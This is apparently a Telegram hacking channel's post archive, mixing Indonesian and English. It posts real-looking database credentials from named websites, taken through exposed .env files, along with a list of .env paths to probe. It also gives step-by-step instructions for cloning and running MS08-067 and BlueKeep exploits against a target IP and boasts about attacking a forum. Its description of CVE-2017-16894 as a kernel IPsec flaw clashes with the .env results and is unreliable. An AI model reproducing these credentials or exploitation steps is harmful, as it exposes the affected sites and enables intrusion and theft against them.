NullXploiters Syndicate
الذهاب إلى القناة على Telegram
إظهار المزيد
3 399
المشتركون
لا توجد بيانات24 ساعات
-147 أيام
-6730 أيام
أرشيف المشاركات
This tool of mine is really deadly if the CPU is small and using a bad server, but according to the results, qkqkqkqkkqk😈
Result dari tools saya
Result From My Tools
Method: CVE-2017-16894
Site: http://1xbetolay.com/.env
Host: localhost
User: u733886155_hm
Password: $xva?*J7k
Database: u733886155_hm
Method: CVE-2017-16894
Site: http://asset.if.unram.ac.id/.env
Host: 127.0.0.1
User: assetif_psti
Password: @ifasset2023#
Database: assetif_psti
Method: CVE-2017-16894
Site: http://kpi.unisbank.ac.id/.env
Host: 127.0.0.1
User: root
Password:
Database: kpi_unisbank
Beberapa path dari saya bisa kalian isi ke output.txt
.env
laravel/.env
app/.env
api/.env
CVE-2017-16894 adalah kerentanan pada kernel Linux, tepatnya di subsistem IPsec (xfrm), yang memungkinkan privilege escalation. Penyerang dengan akses pengguna terbatas dapat mengeksploitasi celah ini untuk mendapatkan hak akses yang lebih tinggi di sistem. Repositori ini menyediakan bukti konsep (PoC) untuk menguji kerentanan tersebut pada sistem Linux yang rentan.
Link Mass Scan
https://github.com/LuanDevecchi/CVE201716894/
MS08-067 adalah kerentanan kritis pada Windows Server Service (SVCHOST.EXE) yang memungkinkan Remote Code Execution (RCE) melalui protokol SMB. Celah ini digunakan oleh malware terkenal seperti Conficker untuk menyebar secara otomatis ke komputer lain di jaringan. Repositori ini menyediakan skrip eksploitasi MS08-067 untuk pengujian keamanan pada sistem yang rentan.
https://github.com/andyacer/ms08_067
——-
MS08-067 is a critical vulnerability in Windows Server Service (SVCHOST.EXE) that allows Remote Code Execution (RCE) via the SMB protocol. This vulnerability is used by well-known malware such as Conficker to spread automatically to other computers on a network. This repository provides MS08-067 exploit scripts for security testing on vulnerable systems.
https://github.com/andyacer/ms08_067
CVE-2019-0708, dikenal sebagai BlueKeep, adalah kerentanan kritis pada Remote Desktop Protocol (RDP) di Windows yang memungkinkan Remote Code Execution (RCE) tanpa otentikasi. Kerentanan ini memengaruhi sistem Windows XP hingga Windows 7, serta Windows Server 2003 dan 2008. Eksploitasi BlueKeep dapat digunakan untuk membuat worm, yang secara otomatis menyebar ke sistem lain dalam jaringan.
https://github.com/CVE-2019-0708/CVE-2019-0708
Cara Penggunaan (Eksploitasi dari Repository GitHub)
Persiapan
Pastikan Python 3 terinstal.
Clone repositori:
bash
Salin
Edit
git clone https://github.com/CVE-2019-0708/CVE-2019-0708.git
cd CVE-2019-0708
Install Dependensi
Jalankan:
bash
Salin
Edit
pip install -r requirements.txt
Eksekusi Eksploit
Gunakan perintah berikut:
bash
Salin
Edit
python exploit.py <target_ip>
Ganti <target_ip> dengan alamat IP target.
📌 What Is RCE (Remote Code Execution)? ✅
Remote Code Execution (RCE) is one of the most dangerous security vulnerabilities. This exploit allows attackers to execute malicious commands on a target system remotely. This means, without physical access, they can manipulate servers, applications, or even devices connected to a network.
👾 How Does RCE Happen?
RCE often occurs due to bugs or security flaws in applications, such as:
Unvalidated Input
When an application accepts user input without verifying or sanitizing it, such as login forms, file uploads, or API endpoints.
Misconfigurations
Poorly configured servers or applications are easy targets.
Weak Third-Party Integration
For example, applications using outdated or vulnerable third-party libraries or plugins.
⚠️ Impact of RCE
RCE can be highly dangerous, including:
Sensitive Data Theft
Such as user credentials, databases, or critical files.
Full System Control
Hackers can install backdoors, ransomware, or other malware.
Malware Distribution
Compromised systems may be used to attack other targets (botnet).
🛠 Real-World Examples of RCE
Log4Shell (2021)
A vulnerability found in the Log4j Java library. By exploiting this flaw, hackers could execute remote commands on vulnerable servers.
CVE-2019-0708 (BlueKeep)
An RCE flaw in the Windows Remote Desktop Protocol (RDP), enabling worms to spread automatically to other systems.
📌 Apa Itu RCE (Remote Code Execution)? ✅
Remote Code Execution atau RCE ialah salah satu jenis celah keamanan paling berbahaya. Dengan eksploitasi ini, seorang penyerang dapat menjalankan perintah berbahaya di sistem target dari jarak jauh. Ini artinya, tanpa perlu akses fisik atau kerang ygy, mereka bisa memanipulasi server, aplikasi, atau bahkan perangkat yang terhubung ke jaringan.
👾 Bagaimana RCE Bisa Terjadi?
RCE biasanya terjadi karena ada bug atau celah keamanan di aplikasi, misalnya:
Input yang Tidak Divalidasi
Saat aplikasi menerima input dari pengguna tanpa mengecek atau membersihkan data tersebut, seperti form login, upload file, atau API endpoint.
Misconfiguration
Server atau aplikasi yang dikonfigurasi dengan buruk sering menjadi sasaran empuk.
Integrasi Aplikasi yang Lemah
Misalnya, aplikasi menggunakan library atau plugin pihak ketiga yang sudah usang dan mengandung celah.
⚠️ Dampak dari RCE
RCE bisa sangat berbahaya, di antaranya:
Pencurian data sensitif
Seperti kredensial pengguna, database, atau file penting.
Pengendalian penuh sistem
Hacker bisa memasang backdoor, ransomware, atau malware lainnya.
Distribusi malware
Sistem yang terkena RCE dapat digunakan untuk menyerang target lain (menjadi botnet).
🛠 Contoh Kasus RCE
Log4Shell (2021)
Celah ini ditemukan pada library Log4j Java. Dengan mengeksploitasi kelemahan ini, hacker bisa menjalankan perintah jarak jauh pada server yang rentan.
CVE-2019-0708 (BlueKeep)
RCE pada protokol RDP (Remote Desktop Protocol) Windows, yang memungkinkan worm menyebar secara otomatis ke sistem lain.
I disrupted the forum. The forum leaked data by hacking the forum's account by spamming comments in the live chat and that made them angry.
#NullXploitersSyndicate
